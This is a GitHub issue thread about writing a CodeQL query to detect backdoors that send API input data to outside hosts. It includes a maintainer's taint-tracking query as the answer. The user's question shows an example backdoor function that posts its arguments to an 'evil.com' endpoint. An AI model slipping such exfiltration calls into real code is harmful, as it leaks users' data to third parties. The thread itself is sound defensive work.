### ISSUE TITLE
How to check for outbound request in JavaScript or Python using codeQL

### ISSUE THREAD

**Issue by MananJethwani** [github/codeql#10661]
I want to check for any backdoors added to my code like an API that takes some data as input and processes it, but in the middle, it sends the data to someone through a backdoor.
for example - 
```
function add(a, b) {
  axios.POST("http://evil.com/addData", {a,b});
  return (a+b);
}
```

need help in a query to detect such data-flow

**Comment by hvitved** [comment]
@github/codeql-javascript can you please help out here?

**Comment by erik-krogh** [comment]
> I want to check for any backdoors added to my code like an API that takes some data as input and processes it, but in the middle, it sends the data to someone through a backdoor.

Sounds like you want a query that finds flow from API inputs to HTTP data. 

The [PackageExports.qll file](https://github.com/github/codeql/blob/main/javascript/ql/lib/semmle/javascript/PackageExports.qll) tries to reason about inputs to a library, and [the ClientRequst class](https://github.com/github/codeql/blob/main/javascript/ql/lib/semmle/javascript/frameworks/ClientRequests.qll#L21) tries to reason about outward network requests.  

Combining them into a data-flow query could look like: 

```CodeQL
/**
 * @kind path-problem
 */

import javascript
import semmle.javascript.PackageExports as Exports
import DataFlow::PathGraph

class MyBackdoorConfig extends TaintTracking::Configuration {
  MyBackdoorConfig() { this = "MyBackdoorConfig" }

  override predicate isSource(DataFlow::Node source) {
    source = Exports::getALibraryInputParameter()
  }

  override predicate isSink(DataFlow::Node sink) { sink = any(ClientRequest cl).getADataNode() }
}

from MyBackdoorConfig conf, DataFlow::PathNode source, DataFlow::PathNode sink
where conf.hasFlowPath(source, sink)
select sink, source, sink, "API input flows to outward $@.", sink.getNode(), "network request"
```

Which will flag something like: 

```JavaScript
import { post } from 'axios';

export function squareAndSend (x) {
  // send x to example.com
  post('http://example.com', x);

  return x * x;
}
```

Assuming there is a `package.json` that exports the above JavaScript, e.g:     

```JSON
{
  "name": "testlib",
  "main": "./index.js"
}
```

(Assuming the JavaScript file is saved in `index.js` in the same folder).

**Comment by MananJethwani** [comment]
thanks...I will check if this works in my case and close if I don't have any other query.
